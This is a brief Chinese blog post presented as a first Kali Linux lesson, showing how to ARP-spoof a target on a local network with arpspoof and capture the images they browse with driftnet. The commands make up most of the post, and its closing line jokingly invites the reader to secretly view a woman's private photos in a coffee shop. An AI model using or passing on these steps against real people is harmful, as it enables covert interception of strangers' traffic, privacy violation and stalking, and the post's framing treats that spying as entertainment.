Kali Linux入门第一课 | 内网抓取用户浏览图片
2017-09-13 本文已影响215人
DYBOY
一、内网图片截取:
arpspoof -i eth0 -t 192.168.1.1 192.168.1.144
解释:-i 网卡eth0
-t 目标
网关:192.168.1.1
攻击/监控目标:192.168.1.144
二、在新终端运行:
driftnet -i eth0
抓取到192.168.1.144用户的浏览图片记录三、效果:
刺激不?
这样你就可以偷偷在咖啡店偶遇女神,顺便看看她的私密album,哈哈~
注:本文属于原创文章,转载请注明本文地址!
作者QQ:1099718640
CSDN博客主页:http://blog.csdn.net/dyboy2017